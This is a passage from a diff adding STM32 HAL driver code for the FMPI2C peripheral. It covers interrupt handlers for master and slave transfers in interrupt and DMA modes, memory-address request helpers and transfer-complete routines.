{ + /* Wrong size Status regarding TC flag event */ + /* Call the corresponding callback to inform upper layer of End of Transfer */ + FMPI2C_ITError(hfmpi2c, HAL_FMPI2C_ERROR_SIZE); + } + } + else + { + /* Nothing to do */ + } + + if ((FMPI2C_CHECK_FLAG(tmpITFlags, FMPI2C_FLAG_STOPF) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_IT_STOPI) != RESET)) + { + /* Call FMPI2C Master complete process */ + FMPI2C_ITMasterCplt(hfmpi2c, tmpITFlags); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_OK; +} + +/** + * @brief Interrupt Sub-Routine which handle the Interrupt Flags Slave Mode with Interrupt. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param ITFlags Interrupt flags to handle. + * @param ITSources Interrupt sources enabled. + * @retval HAL status + */ +static HAL_StatusTypeDef FMPI2C_Slave_ISR_IT(struct __FMPI2C_HandleTypeDef *hfmpi2c, uint32_t ITFlags, + uint32_t ITSources) +{ + uint32_t tmpoptions = hfmpi2c->XferOptions; + uint32_t tmpITFlags = ITFlags; + + /* Process locked */ + __HAL_LOCK(hfmpi2c); + + /* Check if STOPF is set */ + if ((FMPI2C_CHECK_FLAG(tmpITFlags, FMPI2C_FLAG_STOPF) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_IT_STOPI) != RESET)) + { + /* Call FMPI2C Slave complete process */ + FMPI2C_ITSlaveCplt(hfmpi2c, tmpITFlags); + } + + if ((FMPI2C_CHECK_FLAG(tmpITFlags, FMPI2C_FLAG_AF) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_IT_NACKI) != RESET)) + { + /* Check that FMPI2C transfer finished */ + /* if yes, normal use case, a NACK is sent by the MASTER when Transfer is finished */ + /* Mean XferCount == 0*/ + /* So clear Flag NACKF only */ + if (hfmpi2c->XferCount == 0U) + { + if ((hfmpi2c->State == HAL_FMPI2C_STATE_LISTEN) && (tmpoptions == FMPI2C_FIRST_AND_LAST_FRAME)) + /* Same action must be done for (tmpoptions == FMPI2C_LAST_FRAME) which removed for + Warning[Pa134]: left and right operands are identical */ + { + /* Call FMPI2C Listen complete process */ + FMPI2C_ITListenCplt(hfmpi2c, tmpITFlags); + } + else if ((hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_TX_LISTEN) && (tmpoptions != FMPI2C_NO_OPTION_FRAME)) + { + /* Clear NACK Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_AF); + + /* Flush TX register */ + FMPI2C_Flush_TXDR(hfmpi2c); + + /* Last Byte is Transmitted */ + /* Call FMPI2C Slave Sequential complete process */ + FMPI2C_ITSlaveSeqCplt(hfmpi2c); + } + else + { + /* Clear NACK Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_AF); + } + } + else + { + /* if no, error use case, a Non-Acknowledge of last Data is generated by the MASTER*/ + /* Clear NACK Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_AF); + + /* Set ErrorCode corresponding to a Non-Acknowledge */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_AF; + + if ((tmpoptions == FMPI2C_FIRST_FRAME) || (tmpoptions == FMPI2C_NEXT_FRAME)) + { + /* Call the corresponding callback to inform upper layer of End of Transfer */ + FMPI2C_ITError(hfmpi2c, hfmpi2c->ErrorCode); + } + } + } + else if ((FMPI2C_CHECK_FLAG(tmpITFlags, FMPI2C_FLAG_RXNE) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_IT_RXI) != RESET)) + { + if (hfmpi2c->XferCount > 0U) + { + /* Read data from RXDR */ + *hfmpi2c->pBuffPtr = (uint8_t)hfmpi2c->Instance->RXDR; + + /* Increment Buffer pointer */ + hfmpi2c->pBuffPtr++; + + hfmpi2c->XferSize--; + hfmpi2c->XferCount--; + } + + if ((hfmpi2c->XferCount == 0U) && \ + (tmpoptions != FMPI2C_NO_OPTION_FRAME)) + { + /* Call FMPI2C Slave Sequential complete process */ + FMPI2C_ITSlaveSeqCplt(hfmpi2c); + } + } + else if ((FMPI2C_CHECK_FLAG(tmpITFlags, FMPI2C_FLAG_ADDR) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_IT_ADDRI) != RESET)) + { + FMPI2C_ITAddrCplt(hfmpi2c, tmpITFlags); + } + else if ((FMPI2C_CHECK_FLAG(tmpITFlags, FMPI2C_FLAG_TXIS) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_IT_TXI) != RESET)) + { + /* Write data to TXDR only if XferCount not reach "0" */ + /* A TXIS flag can be set, during STOP treatment */ + /* Check if all Data have already been sent */ + /* If it is the case, this last write in TXDR is not sent, correspond to a dummy TXIS event */ + if (hfmpi2c->XferCount > 0U) + { + /* Write data to TXDR */ + hfmpi2c->Instance->TXDR = *hfmpi2c->pBuffPtr; + + /* Increment Buffer pointer */ + hfmpi2c->pBuffPtr++; + + hfmpi2c->XferCount--; + hfmpi2c->XferSize--; + } + else + { + if ((tmpoptions == FMPI2C_NEXT_FRAME) || (tmpoptions == FMPI2C_FIRST_FRAME)) + { + /* Last Byte is Transmitted */ + /* Call FMPI2C Slave Sequential complete process */ + FMPI2C_ITSlaveSeqCplt(hfmpi2c); + } + } + } + else + { + /* Nothing to do */ + } + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_OK; +} + +/** + * @brief Interrupt Sub-Routine which handle the Interrupt Flags Master Mode with DMA. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param ITFlags Interrupt flags to handle. + * @param ITSources Interrupt sources enabled. + * @retval HAL status + */ +static HAL_StatusTypeDef FMPI2C_Master_ISR_DMA(struct __FMPI2C_HandleTypeDef *hfmpi2c, uint32_t ITFlags, + uint32_t ITSources) +{ + uint16_t devaddress; + uint32_t xfermode; + + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + if ((FMPI2C_CHECK_FLAG(ITFlags, FMPI2C_FLAG_AF) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_IT_NACKI) != RESET)) + { + /* Clear NACK Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_AF); + + /* Set corresponding Error Code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_AF; + + /* No need to generate STOP, it is automatically done */ + /* But enable STOP interrupt, to treat it */ + /* Error callback will be send during stop flag treatment */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_CPLT_IT); + + /* Flush TX register */ + FMPI2C_Flush_TXDR(hfmpi2c); + } + else if ((FMPI2C_CHECK_FLAG(ITFlags, FMPI2C_FLAG_TCR) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_IT_TCI) != RESET)) + { + /* Disable TC interrupt */ + __HAL_FMPI2C_DISABLE_IT(hfmpi2c, FMPI2C_IT_TCI); + + if (hfmpi2c->XferCount != 0U) + { + /* Recover Slave address */ + devaddress = (uint16_t)(hfmpi2c->Instance->CR2 & FMPI2C_CR2_SADD); + + /* Prepare the new XferSize to transfer */ + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + xfermode = FMPI2C_RELOAD_MODE; + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + if (hfmpi2c->XferOptions != FMPI2C_NO_OPTION_FRAME) + { + xfermode = hfmpi2c->XferOptions; + } + else + { + xfermode = FMPI2C_AUTOEND_MODE; + } + } + + /* Set the new XferSize in Nbytes register */ + FMPI2C_TransferConfig(hfmpi2c, devaddress, (uint8_t)hfmpi2c->XferSize, xfermode, FMPI2C_NO_STARTSTOP); + + /* Update XferCount value */ + hfmpi2c->XferCount -= hfmpi2c->XferSize; + + /* Enable DMA Request */ + if (hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_RX) + { + hfmpi2c->Instance->CR1 |= FMPI2C_CR1_RXDMAEN; + } + else + { + hfmpi2c->Instance->CR1 |= FMPI2C_CR1_TXDMAEN; + } + } + else + { + /* Call TxCpltCallback() if no stop mode is set */ + if (FMPI2C_GET_STOP_MODE(hfmpi2c) != FMPI2C_AUTOEND_MODE) + { + /* Call FMPI2C Master Sequential complete process */ + FMPI2C_ITMasterSeqCplt(hfmpi2c); + } + else + { + /* Wrong size Status regarding TCR flag event */ + /* Call the corresponding callback to inform upper layer of End of Transfer */ + FMPI2C_ITError(hfmpi2c, HAL_FMPI2C_ERROR_SIZE); + } + } + } + else if ((FMPI2C_CHECK_FLAG(ITFlags, FMPI2C_FLAG_TC) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_IT_TCI) != RESET)) + { + if (hfmpi2c->XferCount == 0U) + { + if (FMPI2C_GET_STOP_MODE(hfmpi2c) != FMPI2C_AUTOEND_MODE) + { + /* Generate a stop condition in case of no transfer option */ + if (hfmpi2c->XferOptions == FMPI2C_NO_OPTION_FRAME) + { + /* Generate Stop */ + hfmpi2c->Instance->CR2 |= FMPI2C_CR2_STOP; + } + else + { + /* Call FMPI2C Master Sequential complete process */ + FMPI2C_ITMasterSeqCplt(hfmpi2c); + } + } + } + else + { + /* Wrong size Status regarding TC flag event */ + /* Call the corresponding callback to inform upper layer of End of Transfer */ + FMPI2C_ITError(hfmpi2c, HAL_FMPI2C_ERROR_SIZE); + } + } + else if ((FMPI2C_CHECK_FLAG(ITFlags, FMPI2C_FLAG_STOPF) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_IT_STOPI) != RESET)) + { + /* Call FMPI2C Master complete process */ + FMPI2C_ITMasterCplt(hfmpi2c, ITFlags); + } + else + { + /* Nothing to do */ + } + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_OK; +} + +/** + * @brief Interrupt Sub-Routine which handle the Interrupt Flags Slave Mode with DMA. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param ITFlags Interrupt flags to handle. + * @param ITSources Interrupt sources enabled. + * @retval HAL status + */ +static HAL_StatusTypeDef FMPI2C_Slave_ISR_DMA(struct __FMPI2C_HandleTypeDef *hfmpi2c, uint32_t ITFlags, + uint32_t ITSources) +{ + uint32_t tmpoptions = hfmpi2c->XferOptions; + uint32_t treatdmanack = 0U; + HAL_FMPI2C_StateTypeDef tmpstate; + + /* Process locked */ + __HAL_LOCK(hfmpi2c); + + /* Check if STOPF is set */ + if ((FMPI2C_CHECK_FLAG(ITFlags, FMPI2C_FLAG_STOPF) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_IT_STOPI) != RESET)) + { + /* Call FMPI2C Slave complete process */ + FMPI2C_ITSlaveCplt(hfmpi2c, ITFlags); + } + + if ((FMPI2C_CHECK_FLAG(ITFlags, FMPI2C_FLAG_AF) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_IT_NACKI) != RESET)) + { + /* Check that FMPI2C transfer finished */ + /* if yes, normal use case, a NACK is sent by the MASTER when Transfer is finished */ + /* Mean XferCount == 0 */ + /* So clear Flag NACKF only */ + if ((FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_CR1_TXDMAEN) != RESET) || + (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_CR1_RXDMAEN) != RESET)) + { + /* Split check of hdmarx, for MISRA compliance */ + if (hfmpi2c->hdmarx != NULL) + { + if (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_CR1_RXDMAEN) != RESET) + { + if (__HAL_DMA_GET_COUNTER(hfmpi2c->hdmarx) == 0U) + { + treatdmanack = 1U; + } + } + } + + /* Split check of hdmatx, for MISRA compliance */ + if (hfmpi2c->hdmatx != NULL) + { + if (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_CR1_TXDMAEN) != RESET) + { + if (__HAL_DMA_GET_COUNTER(hfmpi2c->hdmatx) == 0U) + { + treatdmanack = 1U; + } + } + } + + if (treatdmanack == 1U) + { + if ((hfmpi2c->State == HAL_FMPI2C_STATE_LISTEN) && (tmpoptions == FMPI2C_FIRST_AND_LAST_FRAME)) + /* Same action must be done for (tmpoptions == FMPI2C_LAST_FRAME) which removed for + Warning[Pa134]: left and right operands are identical */ + { + /* Call FMPI2C Listen complete process */ + FMPI2C_ITListenCplt(hfmpi2c, ITFlags); + } + else if ((hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_TX_LISTEN) && (tmpoptions != FMPI2C_NO_OPTION_FRAME)) + { + /* Clear NACK Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_AF); + + /* Flush TX register */ + FMPI2C_Flush_TXDR(hfmpi2c); + + /* Last Byte is Transmitted */ + /* Call FMPI2C Slave Sequential complete process */ + FMPI2C_ITSlaveSeqCplt(hfmpi2c); + } + else + { + /* Clear NACK Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_AF); + } + } + else + { + /* if no, error use case, a Non-Acknowledge of last Data is generated by the MASTER*/ + /* Clear NACK Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_AF); + + /* Set ErrorCode corresponding to a Non-Acknowledge */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_AF; + + /* Store current hfmpi2c->State, solve MISRA2012-Rule-13.5 */ + tmpstate = hfmpi2c->State; + + if ((tmpoptions == FMPI2C_FIRST_FRAME) || (tmpoptions == FMPI2C_NEXT_FRAME)) + { + if ((tmpstate == HAL_FMPI2C_STATE_BUSY_TX) || (tmpstate == HAL_FMPI2C_STATE_BUSY_TX_LISTEN)) + { + hfmpi2c->PreviousState = FMPI2C_STATE_SLAVE_BUSY_TX; + } + else if ((tmpstate == HAL_FMPI2C_STATE_BUSY_RX) || (tmpstate == HAL_FMPI2C_STATE_BUSY_RX_LISTEN)) + { + hfmpi2c->PreviousState = FMPI2C_STATE_SLAVE_BUSY_RX; + } + else + { + /* Do nothing */ + } + + /* Call the corresponding callback to inform upper layer of End of Transfer */ + FMPI2C_ITError(hfmpi2c, hfmpi2c->ErrorCode); + } + } + } + else + { + /* Only Clear NACK Flag, no DMA treatment is pending */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_AF); + } + } + else if ((FMPI2C_CHECK_FLAG(ITFlags, FMPI2C_FLAG_ADDR) != RESET) && \ + (FMPI2C_CHECK_IT_SOURCE(ITSources, FMPI2C_IT_ADDRI) != RESET)) + { + FMPI2C_ITAddrCplt(hfmpi2c, ITFlags); + } + else + { + /* Nothing to do */ + } + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_OK; +} + +/** + * @brief Master sends target device address followed by internal memory address for write request. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param MemAddress Internal memory address + * @param MemAddSize Size of internal memory address + * @param Timeout Timeout duration + * @param Tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef FMPI2C_RequestMemoryWrite(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, + uint16_t MemAddress, uint16_t MemAddSize, uint32_t Timeout, + uint32_t Tickstart) +{ + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)MemAddSize, FMPI2C_RELOAD_MODE, FMPI2C_GENERATE_START_WRITE); + + /* Wait until TXIS flag is set */ + if (FMPI2C_WaitOnTXISFlagUntilTimeout(hfmpi2c, Timeout, Tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* If Memory address size is 8Bit */ + if (MemAddSize == FMPI2C_MEMADD_SIZE_8BIT) + { + /* Send Memory Address */ + hfmpi2c->Instance->TXDR = FMPI2C_MEM_ADD_LSB(MemAddress); + } + /* If Memory address size is 16Bit */ + else + { + /* Send MSB of Memory Address */ + hfmpi2c->Instance->TXDR = FMPI2C_MEM_ADD_MSB(MemAddress); + + /* Wait until TXIS flag is set */ + if (FMPI2C_WaitOnTXISFlagUntilTimeout(hfmpi2c, Timeout, Tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Send LSB of Memory Address */ + hfmpi2c->Instance->TXDR = FMPI2C_MEM_ADD_LSB(MemAddress); + } + + /* Wait until TCR flag is set */ + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_TCR, RESET, Timeout, Tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + return HAL_OK; +} + +/** + * @brief Master sends target device address followed by internal memory address for read request. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param MemAddress Internal memory address + * @param MemAddSize Size of internal memory address + * @param Timeout Timeout duration + * @param Tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef FMPI2C_RequestMemoryRead(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, + uint16_t MemAddress, uint16_t MemAddSize, uint32_t Timeout, + uint32_t Tickstart) +{ + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)MemAddSize, FMPI2C_SOFTEND_MODE, FMPI2C_GENERATE_START_WRITE); + + /* Wait until TXIS flag is set */ + if (FMPI2C_WaitOnTXISFlagUntilTimeout(hfmpi2c, Timeout, Tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* If Memory address size is 8Bit */ + if (MemAddSize == FMPI2C_MEMADD_SIZE_8BIT) + { + /* Send Memory Address */ + hfmpi2c->Instance->TXDR = FMPI2C_MEM_ADD_LSB(MemAddress); + } + /* If Memory address size is 16Bit */ + else + { + /* Send MSB of Memory Address */ + hfmpi2c->Instance->TXDR = FMPI2C_MEM_ADD_MSB(MemAddress); + + /* Wait until TXIS flag is set */ + if (FMPI2C_WaitOnTXISFlagUntilTimeout(hfmpi2c, Timeout, Tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Send LSB of Memory Address */ + hfmpi2c->Instance->TXDR = FMPI2C_MEM_ADD_LSB(MemAddress); + } + + /* Wait until TC flag is set */ + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_TC, RESET, Timeout, Tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + return HAL_OK; +} + +/** + * @brief FMPI2C Address complete process callback. + * @param hfmpi2c FMPI2C handle. + * @param ITFlags Interrupt flags to handle. + * @retval None + */ +static void FMPI2C_ITAddrCplt(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t ITFlags) +{ + uint8_t transferdirection; + uint16_t slaveaddrcode; + uint16_t ownadd1code; + uint16_t ownadd2code; + + /* Prevent unused argument(s) compilation warning */ + UNUSED(ITFlags); + + /* In case of Listen state, need to inform upper layer of address match code event */ + if (((uint32_t)hfmpi2c->State & (uint32_t)HAL_FMPI2C_STATE_LISTEN) == (uint32_t)HAL_FMPI2C_STATE_LISTEN) + { + transferdirection = FMPI2C_GET_DIR(hfmpi2c); + slaveaddrcode = FMPI2C_GET_ADDR_MATCH(hfmpi2c); + ownadd1code = FMPI2C_GET_OWN_ADDRESS1(hfmpi2c); + ownadd2code = FMPI2C_GET_OWN_ADDRESS2(hfmpi2c); + + /* If 10bits addressing mode is selected */ + if (hfmpi2c->Init.AddressingMode == FMPI2C_ADDRESSINGMODE_10BIT) + { + if ((slaveaddrcode & SLAVE_ADDR_MSK) == ((ownadd1code >> SLAVE_ADDR_SHIFT) & SLAVE_ADDR_MSK)) + { + slaveaddrcode = ownadd1code; + hfmpi2c->AddrEventCount++; + if (hfmpi2c->AddrEventCount == 2U) + { + /* Reset Address Event counter */ + hfmpi2c->AddrEventCount = 0U; + + /* Clear ADDR flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_ADDR); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Call Slave Addr callback */ +#if (USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) + hfmpi2c->AddrCallback(hfmpi2c, transferdirection, slaveaddrcode); +#else + HAL_FMPI2C_AddrCallback(hfmpi2c, transferdirection, slaveaddrcode); +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ + } + } + else + { + slaveaddrcode = ownadd2code; + + /* Disable ADDR Interrupts */ + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_LISTEN_IT); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Call Slave Addr callback */ +#if (USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) + hfmpi2c->AddrCallback(hfmpi2c, transferdirection, slaveaddrcode); +#else + HAL_FMPI2C_AddrCallback(hfmpi2c, transferdirection, slaveaddrcode); +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ + } + } + /* else 7 bits addressing mode is selected */ + else + { + /* Disable ADDR Interrupts */ + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_LISTEN_IT); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Call Slave Addr callback */ +#if (USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) + hfmpi2c->AddrCallback(hfmpi2c, transferdirection, slaveaddrcode); +#else + HAL_FMPI2C_AddrCallback(hfmpi2c, transferdirection, slaveaddrcode); +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ + } + } + /* Else clear address flag only */ + else + { + /* Clear ADDR flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_ADDR); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + } +} + +/** + * @brief FMPI2C Master sequential complete process. + * @param hfmpi2c FMPI2C handle. + * @retval None + */ +static void FMPI2C_ITMasterSeqCplt(FMPI2C_HandleTypeDef *hfmpi2c) +{ + /* Reset FMPI2C handle mode */ + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* No Generate Stop, to permit restart mode */ + /* The stop will be done at the end of transfer, when FMPI2C_AUTOEND_MODE enable */ + if (hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_TX) + { + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->PreviousState = FMPI2C_STATE_MASTER_BUSY_TX; + hfmpi2c->XferISR = NULL; + + /* Disable Interrupts */ + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_TX_IT); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) + hfmpi2c->MasterTxCpltCallback(hfmpi2c); +#else + HAL_FMPI2C_MasterTxCpltCallback(hfmpi2c); +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ + } + /* hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_RX */ + else + { + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->PreviousState = FMPI2C_STATE_MASTER_BUSY_RX; + hfmpi2c->XferISR = NULL; + + /* Disable Interrupts */ + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_RX_IT); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) + hfmpi2c->MasterRxCpltCallback(hfmpi2c); +#else + HAL_FMPI2C_MasterRxCpltCallback(hfmpi2c); +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ + } +} + +/** + * @brief FMPI2C Slave sequential complete process. + * @param hfmpi2c FMPI2C handle. + * @retval None + */ +static void FMPI2C_ITSlaveSeqCplt(FMPI2C_HandleTypeDef *hfmpi2c) +{ + uint32_t tmpcr1value = READ_REG(hfmpi2c->Instance->CR1); + + /* Reset FMPI2C handle mode */ + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* If a DMA is ongoing, Update handle size context */ + if (FMPI2C_CHECK_IT_SOURCE(tmpcr1value, FMPI2C_CR1_TXDMAEN) != RESET) + { + /* Disable DMA Request */ + hfmpi2c->Instance->CR1 &= ~FMPI2C_CR1_TXDMAEN; + } + else if (FMPI2C_CHECK_IT_SOURCE(tmpcr1value, FMPI2C_CR1_RXDMAEN) != RESET) + { + /* Disable DMA Request */ + hfmpi2c->Instance->CR1 &= ~FMPI2C_CR1_RXDMAEN; + } + else + { + /* Do nothing */ + } + + if (hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_TX_LISTEN) + { + /* Remove HAL_FMPI2C_STATE_SLAVE_BUSY_TX, keep only HAL_FMPI2C_STATE_LISTEN */ + hfmpi2c->State = HAL_FMPI2C_STATE_LISTEN; + hfmpi2c->PreviousState = FMPI2C_STATE_SLAVE_BUSY_TX; + + /* Disable Interrupts */ + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_TX_IT); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) + hfmpi2c->SlaveTxCpltCallback(hfmpi2c); +#else + HAL_FMPI2C_SlaveTxCpltCallback(hfmpi2c); +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ + } + + else if (hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_RX_LISTEN) + { + /* Remove HAL_FMPI2C_STATE_SLAVE_BUSY_RX, keep only HAL_FMPI2C_STATE_LISTEN */ + hfmpi2c->State = HAL_FMPI2C_STATE_LISTEN; + hfmpi2c->PreviousState = FMPI2C_STATE_SLAVE_BUSY_RX; + + /* Disable Interrupts */ + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_RX_IT); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) + hfmpi2c->SlaveRxCpltCallback(hfmpi2c); +#else + HAL_FMPI2C_SlaveRxCpltCallback(hfmpi2c); +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ + } + else + { + /* Nothing to do */ + } +} + +/** + * @brief FMPI2C Master complete process. + * @param hfmpi2c FMPI2C handle. + * @param ITFlags Interrupt flags to handle. + * @retval None + */ +static void FMPI2C_ITMasterCplt(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t ITFlags) +{ + uint32_t tmperror; + uint32_t tmpITFlags = ITFlags; + __IO uint32_t tmpreg; + + /* Clear STOP Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_STOPF); + + /* Disable Interrupts and Store Previous state */ + if (hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_TX) + { + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_TX_IT); + hfmpi2c->PreviousState = FMPI2C_STATE_MASTER_BUSY_TX; + } + else if (hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_RX) + { + FMPI2C_Disable_IRQ(hfmpi2c, FMPI2C_XFER_RX_IT); + hfmpi2c->PreviousState = FMPI2C_STATE_MASTER_BUSY_RX; + } + else + { + /* Do nothing */ + } + + /* Clear Configuration Register 2 */ + FMPI2C_RESET_CR2(hfmpi2c); + + /* Reset handle parameters */ + hfmpi2c->XferISR = NULL; + hfmpi2c->XferOptions = FMPI2C_NO_OPTION_FRAME; + + if (FMPI2C_CHECK_FLAG(tmpITFlags, FMPI2C_FLAG_AF) != RESET) + { + /* Clear NACK Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_AF); + + /* Set acknowledge error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_AF; + } + + /* Fetch Last receive data if any */ + if ((hfmpi2c->State == HAL_FMPI2C_STATE_ABORT) && (FMPI2C_CHECK_FLAG(tmpITFlags, FMPI2C_FLAG_RXNE) != RESET)) + { + /* Read data from RXDR */ + tmpreg = (uint8_t)hfmpi2c->Instance->RXDR; + UNUSED(tmpreg); + } + + /* Flush TX register */ + FMPI2C_Flush_TXDR(hfmpi2c); + + /* Store current volatile hfmpi2c->ErrorCode, misra rule */ + tmperror = hfmpi2c->ErrorCode; + + /* Call the corresponding callback to inform upper layer of End of Transfer */ + if ((hfmpi2c->State == HAL_FMPI2C_STATE_ABORT) || (tmperror != HAL_FMPI2C_ERROR_NONE)) + { + /* Call the corresponding callback to inform upper layer of End of Transfer */ + FMPI2C_ITError(hfmpi2c, hfmpi2c->ErrorCode); + } + /* hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_TX */ + else if (hfmpi2c->State == HAL_FMPI2C_STATE_BUSY_TX) + { + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->PreviousState = FMPI2C_STATE_NONE; + + if (hfmpi2c->Mode == HAL_FMPI2C_MODE_MEM) + { + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if 